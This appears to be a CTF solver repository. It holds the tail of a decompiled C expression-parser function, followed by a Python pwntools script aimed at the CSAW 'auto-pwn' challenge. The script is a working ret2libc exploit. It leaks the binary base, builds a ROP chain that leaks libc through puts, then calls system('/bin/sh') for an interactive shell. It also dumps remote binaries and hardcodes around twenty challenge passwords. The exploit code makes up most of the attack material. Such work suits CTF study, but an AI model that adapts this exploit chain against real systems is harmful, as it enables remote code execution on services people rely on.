25 | mCpChr = (char *)malloc(nBytes + 1); 26 | memcpy(mCpChr,buffer1024,nBytes); 27 | mCpChr[nBytes] = '\0'; 28 | myChar = strcmp(mCpChr,"0"); // copy byte by byte to use it 29 | 30 | if (myChar == 0) { 31 | puts("prevent division by zero"); 32 | fflush((FILE *)stdout); 33 | returnedVar = 0; 34 | goto LAB_0804935f; 35 | } // no zeros and jumpt to check canary 36 | 37 | myChar = atoi(mCpChr); 38 | if (0 < myChar) { 39 | iterator = *param_2; 40 | *param_2 = iterator + 1; 41 | param_2[iterator + 1] = myChar; 42 | } // change element to asci code 43 | 44 | if ((*(char *)((int)paramBF1024 + contador) != '\0') && 45 | (9 < (int)*(char *)((int)paramBF1024 + contador + 1) - 0x30U)) { 46 | puts("expression error!"); 47 | fflush((FILE *)stdout); 48 | returnedVar = 0; 49 | goto LAB_0804935f; 50 | } // review if is allowed char of not zero 51 | 52 | buffer1024 = (void *)((int)paramBF1024 + contador + 1); // save next char to the actual 53 | 54 | if (arrayExpr[pointerArray] == '\0') { // if actual char is 0: 55 | arrayExpr[pointerArray] = *(char *)((int)paramBF1024 + contador); // expr = char in buffer 56 | } 57 | 58 | 59 | else { 60 | switch(*(undefined *)((int)paramBF1024 + contador)) { // <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 61 | case 0x25: // % 62 | case 0x2a: // * 63 | case 0x2f: // / 64 | 65 | if ((arrayExpr[pointerArray] == '+') || (arrayExpr[pointerArray] == '-')) { // if expr = + or expre = -: 66 | arrayExpr[pointerArray + 1] = *(char *)((int)paramBF1024 + contador); // nextExpr = actual char 67 | pointerArray = pointerArray + 1; // pointerArray ++ 68 | } // 69 | 70 | else { // 71 | eval(param_2,arrayExpr[pointerArray]); // eval(param2, actualChar) 72 | arrayExpr[pointerArray] = *(char *)((int)paramBF1024 + contador); // current expr = current char 73 | } // 74 | 75 | break; 76 | 77 | default: 78 | eval(param_2,arrayExpr[pointerArray]); // eval(param2, actualChar) 79 | pointerArray = pointerArray + -1; // pointerArray -- 80 | break; 81 | 82 | case 0x2b: // + 83 | case 0x2d: // - 84 | 85 | eval(param_2,arrayExpr[pointerArray]); // eval(param2, actualChar) 86 | arrayExpr[pointerArray] = *(char *)((int)paramBF1024 + contador); // 87 | } // switch <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 88 | } 89 | 90 | if (*(char *)((int)paramBF1024 + contador) == '\0') { // <<<<<<<<<<<<<< ya llegamos a un cero 91 | while (-1 < pointerArray) { // if char == 0: 92 | eval(param_2,arrayExpr[pointerArray]); // while (pointer > -1) 93 | pointerArray = pointerArray + -1; // eval(expr, current arrayExp[state]) 94 | } // pointerArray -- 95 | returnedVar = 1; // <<<<<<<<<<<<<< 96 | 97 | 98 | LAB_0804935f: // canary check 99 | if (canary != *(int *)(in_GS_OFFSET + 0x14)) { // 100 | /* WARNING: Subroutine does not return */ // canary broken 101 | __stack_chk_fail(); // 102 | } 103 | 104 | 105 | return returnedVar; 106 | } 107 | } // main if 108 | contador = contador + 1; 109 | } while( true ); 110 | } 111 | 112 | -------------------------------------------------------------------------------- /Templates/leak_binary_rop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | import random 4 | import time 5 | 6 | libc = ELF('./libc-2.24.so') 7 | context.log_level = "DEBUG" 8 | 9 | gs = ''' 10 | ''' 11 | 12 | def start(puerto): 13 | return remote('auto-pwn.chal.csaw.io',int('110'+str(puerto).zfill(2),10)) 14 | 15 | def exploit(elf,libc,p,puerto,password): 16 | p.sendlineafter('> ', password) 17 | p.recvuntil('-------------------------------------------------------------------') 18 | p.recvuntil('Proceeding to the challenge...') 19 | p.recvuntil('Main is at ') 20 | mAin= int(p.recvline(),16) 21 | log.info('main') 22 | print(mAin) 23 | base_bin=mAin-elf.symbols['main'] 24 | log.info('base bin') 25 | print(base_bin) 26 | POP_RDI=next(elf.search(asm("pop rdi; ret")))+base_bin 27 | log.info('POP_RDI') 28 | print(POP_RDI) 29 | PUTS=elf.symbols['puts']+base_bin 30 | p.sendline(b'A'*9+p64(POP_RDI)+p64(elf.got['puts']+base_bin)+p64(PUTS)+p64(mAin)) 31 | leak_libc=p.recv(7)+b'\x00' 32 | leak_libc=[ hex(x) for x in list(leak_libc) ][:-2] 33 | leak_libc= int('0x'+("".join(leak_libc[5]+leak_libc[4]+leak_libc[3]+leak_libc[2]+leak_libc[1]+leak_libc[0]).replace('0x','')),16) 34 | #puede fallar cuando una direccion sea solo 0x7 35 | libc.address=leak_libc-libc.symbols['puts'] 36 | log.info('LIBC BASE') 37 | print(hex(libc.address)) 38 | BINSH = next(libc.search(b"/bin/sh")) 39 | p.sendlineafter('> ', password) 40 | p.recvuntil('-------------------------------------------------------------------') 41 | p.recvuntil('Proceeding to the challenge...') 42 | p.recvuntil('Main is at ') 43 | p.sendline(b'A'*9+p64(POP_RDI)+p64(BINSH)+p64(libc.symbols['system'])+p64(mAin)) 44 | p.interactive() 45 | # p.sendline('cat message.txt') 46 | # password=get_message(p) 47 | # return password 48 | 49 | 50 | def dump_binary(puerto, password): 51 | p=start(puerto) 52 | p.sendlineafter('> ', password) 53 | p.recvuntil('-------------------------------------------------------------------') 54 | p.recvuntil('Proceeding to the challenge...') 55 | p.recvuntil('Main is at ') 56 | mAin= int(p.recvline(),16) 57 | p.sendline(b'A'*9+p64(mAin)) 58 | p.sendlineafter('> ', password) 59 | p.recvuntil("-------------------------------------------------------------------\n") 60 | dump=p.recvuntil('-------------------------------------------------------------------\n') 61 | f=open(f"binary_{puerto}.txt","wb") 62 | f.write(dump) 63 | os.system(f'xxd -r binary_{puerto}.txt binary_{puerto}') 64 | 65 | 66 | 67 | def get_message(p): 68 | p.sendline('cat message.txt') 69 | sleep(3) 70 | try: 71 | p.recvuntil('Sorry, but your flag is in another box!') 72 | p.recvuntil('and use password ') 73 | except: 74 | p.interactive 75 | linea=p.recvline() 76 | log.info('linea') 77 | print(linea) 78 | return linea[:-1] 79 | 80 | # def round(puerto,password): 81 | # dump_binary(puerto) 82 | # elf=ELF(f'./binary_{puerto}') 83 | # p=start(puerto) 84 | # dump_binary(puerto) 85 | 86 | 87 | ###################################################### 88 | # p=start(1) 89 | # dump_binary(1,"8d16635db965bc4e0a97521e8105fad2") 90 | # context.binary =f'./binary_1' 91 | # elf=context.binary 92 | # exploit(elf,libc,p,1,"8d16635db965bc4e0a97521e8105fad2") 93 | 94 | 95 | # p=start(2) 96 | # dump_binary(2,"5ba73db3117a885aaa3c80ebe4ec603e") 97 | # context.binary =f'./binary_2' 98 | # elf=context.binary 99 | # exploit(elf,libc,p,2,"5ba73db3117a885aaa3c80ebe4ec603e") 100 | 101 | # p=start(3) 102 | # dump_binary(3,"d4e32a79d4597bb10a5ba69aaf8689e3") 103 | # context.binary =f'./binary_3' 104 | # elf=context.binary 105 | # exploit(elf,libc,p,3,"d4e32a79d4597bb10a5ba69aaf8689e3") 106 | 107 | # p=start(4) 108 | # dump_binary(4,"6a4075dc8cd20edc6146f91b7e42684c") 109 | # context.binary =f'./binary_4' 110 | # elf=context.binary 111 | # exploit(elf,libc,p,4,"6a4075dc8cd20edc6146f91b7e42684c") 112 | 113 | # p=start(5) 114 | # dump_binary(5,"05d618e1dc560b4a84c3371525c7e2d1") 115 | # context.binary =f'./binary_5' 116 | # elf=context.binary 117 | # exploit(elf,libc,p,5,"05d618e1dc560b4a84c3371525c7e2d1") 118 | 119 | # p=start(6) 120 | # dump_binary(6,"d2f5718673f78494d2d172b1fe9e5d6c") 121 | # context.binary =f'./binary_6' 122 | # elf=context.binary 123 | # exploit(elf,libc,p,6,"d2f5718673f78494d2d172b1fe9e5d6c") 124 | 125 | # p=start(7) 126 | # dump_binary(7,"1eb2463f80b9b81f868007d49479b8b8") 127 | # context.binary =f'./binary_7' 128 | # elf=context.binary 129 | # exploit(elf,libc,p,7,"1eb2463f80b9b81f868007d49479b8b8") 130 | 131 | rrr=21 132 | pzw="13462b403d91edd8c8389517c1eca3ed" 133 | p=start(rrr) 134 | dump_binary(rrr,pzw) 135 | context.binary =f'./binary_{rrr}' 136 | elf=context.binary 137 | exploit(elf,libc,p,rrr,pzw) 138 | 139 | # 8d16635db965bc4e0a97521e8105fad2 140 | # 5ba73db3117a885aaa3c80ebe4ec603e 141 | # d4e32a79d4597bb10a5ba69aaf8689e3 142 | # 6a4075dc8cd20edc6146f91b7e42684c 143 | # 05d618e1dc560b4a84c3371525c7e2d1\n 144 | # d2f5718673f78494d2d172b1fe9e5d6c\n 145 | # 1eb2463f80b9b81f868007d49479b8b8\n 146 | # 942bf6a59242d014736e056aa9b5a61f 147 | # 930f8b14dc3a2c7645bc572920469fe6\n 148 | # ba41eaf361c65c536c4780f86b886003\n 149 | # d38caab88089f49fec5a483804407b60\n 150 | # d0e4746d3ae45cfad33552dd36b4e194\n 151 | # e042a30077c6bc66146838f7b00506e3\n 152 | # 007e5be15fbbead1ffb6d388e827c23a\n 153 | # 2e0427a53d33dc48e3e3856552328265\n 154 | # 836e8564c5d94de7c61cff04e8b027c4\n 155 | # 551d8e3265626d426fb79174c9f9312b\n 156 | # 0ddded9a55029fdc68a9c4b0b3b949d9\n 157 | # e8003fc36aa0b5abbf48d5b764de9080\n 158 | # 0e66a25c5002764ccf67139a851d0cb8\n 20 159 | # 13462b403d91edd8c8389517c1eca3ed\n 160 | 161 | 162 | # log.info('password') 163 | # print(password) 164 | p.close() 165 | 166 | # p=start(1) 167 | # dump_binary(1,"8d16635db965bc4e0a97521e8105fad2") 168 | # context.binary =f'./binary_1' 169 | # elf=context.binary 170 | # password=exploit(elf,libc,p,1,"8d16635db965bc4e0a97521e8105fad2") 171 | # log.info('password') 172 | # print(password) 173 | # p.close() 174 | 175 | # puerto=2 176 | # while(1): 177 | # try: 178 | # os.system('clear') 179 | # log.info(f'puerto 110{puerto}') 180 | # log.info('password') 181 | # print(password) 182 | # if puerto>5: 183 | # break 184 | # pause() 185 | # log.info('START...') 186 | # p=start(puerto) 187 | # log.info('STARTED') 188 | # log.info('DUMPING') 189 | # dump_binary(puerto,password) 190 | # log.info('DUMPED') 191 | # pause() 192 | # context.binary =f'./binary_{puerto}' 193 | # elf=context.binary 194 | # password=exploit(elf,libc,p,puerto,password) 195 | # log.info('password') 196 | # print(password) 197 | # p.close() 198 | # puerto=puerto+1 199 | # except: 200 | # sleep(3) 201 | 202 | 203 | # [DEBUG] Received 0x79 bytes: 204 | # b'Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11003 and use password d4e32a79d4597bb10a5ba69aaf8689e3\n' 205 | # Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11003 and use password d4e32a79d4597bb10a5ba69aaf8689e3 206 | # $ 207 | 208 | 209 | # 5ba73db3117a885aaa3c80ebe4ec603e --------------------------------------------------------------------------------